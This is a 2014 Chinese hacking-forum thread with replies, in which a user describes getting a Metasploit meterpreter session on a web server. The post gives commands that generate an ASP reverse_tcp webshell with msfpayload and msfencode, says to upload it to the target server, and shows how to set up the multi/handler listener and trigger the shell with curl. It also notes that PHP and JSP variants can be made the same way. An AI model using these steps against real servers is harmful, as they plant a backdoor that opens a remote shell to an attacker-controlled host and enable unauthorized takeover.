查看: 13555|回复: 4

MSF通过shell获得session的方法

[复制链接]
  • TA的每日心情
    奋斗
    2021-12-29 18:17
  • 签到天数: 45 天

    [LV.5]常住居民I

    发表于 2014-11-22 11:37:27 | 显示全部楼层 |阅读模式
    这是昨天渗透的时候遇到的问题 就简单整理了一下发出来。

    Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,
    一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,
    幸运的话可以产生一个session,以便进一步利用。



    下面是具体的利用方法。




    我们可以通过指令查看msf里的payload 然后记住其位置:使用如下的指令来产生一个webshell,和前边将的msfpayload的用法类似,只不过这里生成的是一个网页脚本文件:
    产生webshell

    msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip | msfencode -t asp -o webshell.asp

    然后将此webshell上传到服务器(这个步骤要有上传权限。)
    然后启动msfconsole

    输入use exploits/multi/handler,
    set PAYLOAD windows/meterpreter/reverse_tcp(这里的payload要和前边的msfpayload所使用的一样。
    set LHOST your_ip,
    执行exploit,
    然 后访问webshell的url,这里使用curl 访问curl http://host/webshell.asp ,如果exploit执行成功的话就可以看到msfconsole中有返回meterpreter shell,如果meterpreter不会用网上查一下,很多。
    但是我使用netbox 搭建asp环境老是执行出错,希望读者在实际验证不出错后再使用。
    这里产生的是asp的webshell 也可以产生php webshell,jsp webshell 需要在msfencode时用-t 参数指定脚本类型,我认为php类型的webshell更容易成功。

    评分

    参与人数 2i币 +14 收起 理由
    契约 + 4 不错,顶个
    C4r1st + 10 感谢分享

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

    发表于 2014-11-22 12:14:59 | 显示全部楼层
    在12年的时候我也玩过Metasploit,应该是学过,好像看到过这样的文章,感谢分享。
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-11-22 13:02:50 | 显示全部楼层
    非常谢谢
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2016-7-6 16:30
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2014-11-22 15:01:43 | 显示全部楼层
    已测试,就是菜刀的交互模式
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2017-6-22 13:45
  • 签到天数: 44 天

    [LV.5]常住居民I

    发表于 2014-11-24 21:29:04 | 显示全部楼层
    恩,我一直用的生成的exe,获取pc的meterpreter,没想到还能获取网站的
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-1 19:36 , Processed in 0.028604 second(s), 13 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部